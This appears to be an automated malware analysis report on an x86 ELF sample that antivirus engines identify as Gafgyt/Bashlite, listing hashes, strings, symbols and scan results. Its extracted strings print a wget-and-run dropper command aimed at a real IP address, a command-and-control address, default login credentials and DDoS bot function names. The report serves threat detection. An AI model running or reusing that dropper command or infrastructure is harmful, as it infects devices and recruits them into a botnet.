Report #3481 cancel

Binary
ABI
ELFOSABI_SYSV
Size
62.78KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
7b14c57918df578a14c300c788644701
sha1
e6ff619f993eb772d06b0e142790a22f3e2188aa
crc32
0x14779bdc
sha224
c3715e777c86de4abcd7b9cfd9ebd02c343df2ef2423fbebf18b0335
sha256
2d3ebed2054f91563736a938d884a9bf6b144fd157602a65119120785c93c13a
sha384
c3b927cc9735bbb333b512722a206fe2e2690ddf5e0a4353b6905812e660110d35b25a36f4c50f411f44c8de0dfb7ab2
sha512
53f53d61bee750aa3201063508b6cc03ab81359b4fcdd72b25705cd968ded2f14c0fae12f3efea17249d8fc543e23ca4e8d2b38f2cff3aaf4f0f169239e42219
ssdeep
1536:k0NDvv4T+0rg9V1j6uptP0nX82IZU6Q/AFdfZ9DrNJK:k0ua089V1j6upw82p6LFdfq
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo, /proc/net/route
Password

Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
212.237.53.46:777, cd /tmp || cd /var/run;wget http://212.237.53.46/wbin.sh;sh wbin.sh;rm -rf wbin.sh;rm -rf wbin.sh
URLs
cd /tmp || cd /var/run;wget http://212.237.53.46/wbin.sh;sh wbin.sh;rm -rf wbin.sh;rm -rf wbin.sh
Mails

Suspicious
True check_circle
Strings
List
cd /tmp || cd /var/run;wget http://212.237.53.46/wbin.sh;sh wbin.sh;rm -rf wbin.sh;rm -rf wbin.sh
212.237.53.46:777
.got.plt
None Killed.
Killed %d.
been_there_done_that.2832
been_there_done_that
_fwrite.c
open.c
write.c
fork failed
pass
REPORT %s:%s:%s
My IP: %s
Invalid flag "%s"
8.8.8.8
[cpuset]
__GI_execl
__GI_fflush_unlocked
PONG!
__libc_nanosleep
__GI_sleep
__socketcall
__GI_execve
__register_frame_info_bases
__GI_pipe
_Jv_RegisterClasses
__deregister_frame_info_bases
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
__socketcall.c
fflush_unlocked
socket.c
__GI_socket
sleep.c
sendHTTP
tcpcsum
@login guest kek
PONG
HTTP
commServer
pipe.c
inet_addr
currentServer
makeIPPacket
usernames
KILLATTK
random_poly_info
random.c
random_r
changeme
nanosleep
srandom_r
__GI_random_r
password
sendTCP
fwrite_unlocked
processCmd
random_r.c
__GI_srandom_r
passwords
getHost
__GI_random
connect
sleep
guest
makeRandomStr
getRandomIP
socket
admin
GETLOCALIP
shell
system
srandom
recv
send
random
FAILED TO CONNECT
getpagesize.c
__getpagesize
__GI_getpagesize
waitpid.c
getpid.c
__libc_getpid
completed.2429
Failed opening raw socket.
__libc_waitpid
object.2482
__GI_waitpid
fseeko64.c
__GI_getpid
next_start.1109
.comment
__GI_dup2
__GI_wait4
__GI_fseeko64
ulti-call
__CTOR_END__
__DTOR_END__

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, c, Q, i.4251, printchar, prints, printi, print, fdopen_pids, hextable, ipState, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, puts.c, popen.c, mylock, popen_list, _stdio.c, _stdio_streams, __stdio_mutex_initializer.3991, _fixed_buffers, _wcommit.c, fputc_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcpy.c, strlen.c, strstr.c, strtok.c, next_start.1109, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2658, inet_makeaddr.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.2832, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, errno.c, fclose.c, fdopen.c, _WRITE.c, _fopen.c, _fwrite.c, _trans2w.c, _uintmaxtostr.c, fflush_unlocked.c, memchr.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, raise.c, dl-support.c, brk.c, fseeko.c, fseeko64.c, _adjust_pos.c, _cs_funcs.c, rawmemchr.c, strspn.c, llseek.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, waitpid, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, popen, sysconf, stdout, random, __GI_getpagesize, getdtablesize, __GI_h_errno, __GI___ctype_toupper, putc_unlocked, recv, connect, __GI___uClibc_fini, numpids, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, __GI_setsid, sendTCP, pclose, __bsd_signal, __GI_strpbrk, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, __ctype_b, __GI_random_r, usernames, errno, getegid, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, getHost, __libc_getpid, wildString, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, puts, __GI___C_ctype_toupper, __libc_nanosleep, trim, dup2, __pthread_mutex_init, getuid, system, malloc, isatty, sleep, __GI_atol, __GI_read, random_r, __dso_handle, clock_getres, tcpcsum, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_write, __ctype_toupper, __libc_read, __GI_open, __GI_strchr, sigaddset, __GI_tcgetattr, __environ, mmap, makeIPPacket, sockprintf, __GI_inet_ntoa, send, abort, __GI_fcntl, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, write, environ, __GI_close, kill, fputs_unlocked, __pthread_mutex_trylock, strcat, __GI_brk, __GI_strcat, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, setstate, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, getCores, __GI_memcpy, _stdio_user_locking, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, __libc_send, currentServer, __GI_getrlimit, __GI_strcpy, strtok, __GI___fputc_unlocked, __stdio_adjust_position, malloc_trim, fdopen, fork, gotIP, __GI_sleep, sigaction, _dl_phdr, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, __bss_start, __libc_open, getOurIP, memset, __GI_socket, main, listFork, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, tcgetattr, time, __libc_system, __GI_abort, fdpopen, __stdio_init_mutex, __GI__exit, data_start, __GI_sysconf, __h_errno_location, __GI_putc_unlocked, matchPrompt, __C_ctype_b_data, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, fdgets, __get_pc_thunk_bx, __GI_select, __libc_waitpid, __GI_waitpid, _stdio_term, __GI_signal, stderr, commServer, vfork, __C_ctype_b, srandom, __GI_sendto, __GI_sigemptyset, __libc_fork, __atexit_lock, scanPid, rand_cmwc, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, _end, htons, _sigintr, __GI_strspn, initstate_r, __GI_connect, __curbrk, _dl_phnum, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, brk, __C_ctype_toupper_data, _dl_aux_init, sendJUNK, _errno, atoi, _stdio_openlist_del_lock, __GI_inet_aton, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, _Jv_RegisterClasses, macAddress, __GI___errno_location, fputc_unlocked, readUntil, fcntl, __GI_fdopen, __GI_atoi, fseeko64, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, sendHOLD, mainCommSock, pids, strpbrk, getBogos, raise, free, sigprocmask, __fputc_unlocked, getsockname
Number
567
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False cancel
Segments
Number
3
Suspicious
False cancel
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
117
Suspicious
True check_circle
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , client.c, , c, , Q, , i.4251, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , libc/sysdeps/linux/i386/vfork.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , chdir.c, , close.c, , dup2.c, , fork.c, , getdtablesize.c, , getpid.c, , getrlimit.c, , ioctl.c, , kill.c, , open.c, , pipe.c, , prctl.c, , read.c, , select.c, , setsid.c, , sigprocmask.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , __errno_location.c, , puts.c, , popen.c, , mylock, , popen_list, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.3991, , _fixed_buffers, , _wcommit.c, , fputc_unlocked.c, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strcat.c, , strchr.c, , strcpy.c, , strlen.c, , strstr.c, , strtok.c, , next_start.1109, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2658, , inet_makeaddr.c, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.2832, , sigaction.c, , __restore_rt, , __restore, , __syscall_error.c, , libc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , clock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getpagesize.c, , getuid.c, , munmap.c, , nanosleep.c, , sbrk.c, , wait4.c, , errno.c, , fclose.c, , fdopen.c, , _WRITE.c, , _fopen.c, , _fwrite.c, , _trans2w.c, , _uintmaxtostr.c, , fflush_unlocked.c, , memchr.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , raise.c, , dl-support.c, , brk.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _cs_funcs.c, , rawmemchr.c, , strspn.c, , llseek.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __GI_execve, , __libc_sigaction, , strcpy, , __GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __GI_memchr, , waitpid, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_time, , getgid, , popen, , sysconf, , stdout, , random, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , __GI___ctype_toupper, , putc_unlocked, , recv, , connect, , __GI___uClibc_fini, , numpids, , sigemptyset, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , __uClibc_fini, , memrchr, , geteuid, , __GI_setsid, , sendTCP, , pclose, , __bsd_signal, , __GI_strpbrk, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_pipe, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , __ctype_b, , __GI_random_r, , usernames, , errno, , getegid, , __GI_sbrk, , zprintf, , __GI___uClibc_init, , execve, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , getHost, , __libc_getpid, , wildString, , fcntl64, , prctl, , memcpy, , makeRandomStr, , getRandomIP, , __GI_fputs_unlocked, , execl, , sendHTTP, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , puts, , __GI___C_ctype_toupper, , __libc_nanosleep, , trim, , dup2, , __pthread_mutex_init, , getuid, , system, , malloc, , isatty, , sleep, , __GI_atol, , __GI_read, , random_r, , __dso_handle, , clock_getres, , tcpcsum, , fdpclose, , socket, , __GI_dup2, , select, , _pthread_cleanup_pop_restore, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_write, , __ctype_toupper, , __libc_read, , __GI_open, , __GI_strchr, , sigaddset, , __GI_tcgetattr, , __environ, , mmap, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , abort, , __GI_fcntl, , __GI_fwrite_unlocked, , __GI_getgid, , srandom_r, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , parseHex, , strtol, , pipe, , __libc_lseek64, , rawmemchr, , __GI_mempcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , nanosleep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , __GI_execl, , __GI_srandom_r, , write, , environ, , __GI_close, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , strcat, , __GI_brk, , __GI_strcat, , __GI_nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , setstate, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , __stdin, , stdin, , __GI_isatty, , _start, , __deregister_frame_info_bases, , strstr, , __GI_ioctl, , init_rand, , rand, , signal, , read, , getCores, , __GI_memcpy, , _stdio_user_locking, , htonl, , sendto, , __C_ctype_toupper, , StartTheLelz, , __GI___C_ctype_b, , __libc_send, , currentServer, , __GI_getrlimit, , __GI_strcpy, , strtok, , __GI___fputc_unlocked, , __stdio_adjust_position, , malloc_trim, , fdopen, , fork, , gotIP, , __GI_sleep, , sigaction, , _dl_phdr, , __GI___libc_fcntl64, , __uClibc_init, , __GI_munmap, , __getpagesize, , __GI_random, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , __libc_close, , __GI_getpid, , inet_aton, , index, , _pthread_cleanup_push_defer, , processCmd, , __sigismember, , __bss_start, , __libc_open, , getOurIP, , memset, , __GI_socket, , main, , listFork, , __stdio_fwrite, , negotiate, , srand, , initstate, , fclose, , __syscall_rt_sigaction, , ntohs, , sendUDP, , inet_ntoa, , tcgetattr, , time, , __libc_system, , __GI_abort, , fdpopen, , __stdio_init_mutex, , __GI__exit, , data_start, , __GI_sysconf, , __h_errno_location, , __GI_putc_unlocked, , matchPrompt, , __C_ctype_b_data, , _stdio_fopen, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, , fdgets, , __get_pc_thunk_bx, , __GI_select, , __libc_waitpid, , __GI_waitpid, , _stdio_term, , __GI_signal, , stderr, , commServer, , vfork, , __C_ctype_b, , srandom, , __GI_sendto, , __GI_sigemptyset, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wcommit, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_strstr, , _end, , htons, , _sigintr, , __GI_strspn, , initstate_r, , __GI_connect, , __curbrk, , _dl_phnum, , __errno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , brk, , __C_ctype_toupper_data, , _dl_aux_init, , sendJUNK, , _errno, , atoi, , _stdio_openlist_del_lock, , __GI_inet_aton, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , open, , toupper, , __libc_write, , __malloc_consolidate, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_start, , setsid, , __GI_inet_addr, , _Jv_RegisterClasses, , macAddress, , __GI___errno_location, , fputc_unlocked, , readUntil, , fcntl, , __GI_fdopen, , __GI_atoi, , fseeko64, , __GI_getsockname, , close, , __libc_connect, , passwords, , __GI_strlen, , sendHOLD, , mainCommSock, , pids, , strpbrk, , getBogos, , raise, , free, , sigprocmask, , __fputc_unlocked, , getsockname,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048164
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
48040
AVclass
gafgyt
1
VirusTotal
md5
7b14c57918df578a14c300c788644701
sha1
e6ff619f993eb772d06b0e142790a22f3e2188aa
SCANS (DETECTION RATE = 62.71%)
AVG
result: ELF:Gafgyt-AG [Trj]
update: 20190118
version: 18.4.3895.0
detected: True check_circle

CMC
update: 20190118
version: 1.1.0.977
detected: False cancel

MAX
result: malware (ai score=100)
update: 20190119
version: 2018.9.12.1
detected: True check_circle

Bkav
update: 20190118
version: 1.3.0.9899
detected: False cancel

K7GW
update: 20190118
version: 11.23.29726
detected: False cancel

ALYac
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 1.1.1.5
detected: True check_circle

Avast
result: ELF:Gafgyt-AG [Trj]
update: 20190119
version: 18.4.3895.0
detected: True check_circle

Avira
result: LINUX/Gafgyt.tqnog
update: 20190119
version: 8.3.3.8
detected: True check_circle

Baidu
update: 20190118
version: 1.0.0.2
detected: False cancel

Cyren
update: 20190118
version: 6.2.0.1
detected: False cancel

DrWeb
result: Linux.BackDoor.Fgt.46
update: 20190118
version: 7.0.34.11020
detected: True check_circle

GData
result: Generic.Gafgyt.1.63B936BB
update: 20190119
version: A:25.20231B:25.14174
detected: True check_circle

Panda
update: 20190118
version: 4.6.4.2
detected: False cancel

VBA32
update: 20190118
version: 3.35.1
detected: False cancel

Zoner
update: 20190119
version: 1.0
detected: False cancel

AVware
update: 20180925
version: 1.6.0.52
detected: False cancel

ClamAV
update: 20190118
version: 0.101.1.0
detected: False cancel

Comodo
result: Malware@#35u24in89pl2c
update: 20190119
version: 30296
detected: True check_circle

F-Prot
update: 20190118
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Gafgyt
update: 20190118
version: 0.1.5.2
detected: True check_circle

McAfee
result: Linux/Gafgyt.f
update: 20190119
version: 6.0.6.653
detected: True check_circle

Rising
result: Trojan.Gafgyt/Linux!1.A480 (CLASSIC)
update: 20190119
version: 25.0.0.24
detected: True check_circle

Sophos
result: Linux/DDoS-BI
update: 20190119
version: 4.98.0
detected: True check_circle

Yandex
update: 20190118
version: 5.5.1.3
detected: False cancel

Zillya
result: Backdoor.Gafgyt.Linux.9991
update: 20190118
version: 2.0.0.3733
detected: True check_circle

Arcabit
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 1.0.0.837
detected: True check_circle

Babable
update: 20180918
version: 9107201
detected: False cancel

TACHYON
update: 20190119
version: 2019-01-19.01
detected: False cancel

Tencent
result: backdoor.linux.gafgyt.z
update: 20190119
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20190118
version: 2014.3.20.0
detected: False cancel

Ad-Aware
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 3.0.5.370
detected: True check_circle

AegisLab
result: Trojan.Linux.Generic.m!c
update: 20190119
version: 4.2
detected: True check_circle

Emsisoft
result: Generic.Gafgyt.1.63B936BB (B)
update: 20190118
version: 2018.4.0.1029
detected: True check_circle

F-Secure
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 11.0.19100.45
detected: True check_circle

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20190118
version: 5.4.247.0
detected: True check_circle

Jiangmin
result: Backdoor.Linux.thr
update: 20190119
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20190119
version: 2013.8.14.323
detected: False cancel

Symantec
result: Linux.Lightaidra
update: 20190118
version: 1.8.0.0
detected: True check_circle

AhnLab-V3
result: Linux/Gafgyt.Gen
update: 20190118
version: 3.14.1.22785
detected: True check_circle

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.d
update: 20190119
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.d
update: 20190119
version: 15.0.1.13
detected: True check_circle

Microsoft
result: DDoS:Linux/Lightaidra
update: 20190119
version: 1.1.15500.2
detected: True check_circle

Qihoo-360
result: Win32/Backdoor.acf
update: 20190119
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20190118
version: 6.8.0.5.3962
detected: False cancel

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.d
update: 20190119
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20190119
version: 18730
detected: True check_circle

TrendMicro
update: 20190119
version: 10.0.0.1040
detected: False cancel

BitDefender
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 7.2
detected: True check_circle

K7AntiVirus
update: 20190118
version: 11.23.29725
detected: False cancel

SentinelOne
result: static engine - malicious
update: 20190118
version: 1.0.21.268
detected: True check_circle

Avast-Mobile
result: ELF:Mirai-DG [Trj]
update: 20190118
version: 190118-00
detected: True check_circle

Malwarebytes
update: 20190119
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20190118
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
result: Exploit.Linux.Shellshock.A
update: 20190118
version: 14.00
detected: True check_circle

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.eikqfj
update: 20190119
version: 1.0.134.24576
detected: True check_circle

MicroWorld-eScan
result: Generic.Gafgyt.1.63B936BB
update: 20190119
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
update: 20190116
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: Linux/Gafgyt.f
update: 20190118
version: v2017.3010
detected: True check_circle

TrendMicro-HouseCall
result: ELF_BASHLITE.SMC
update: 20190119
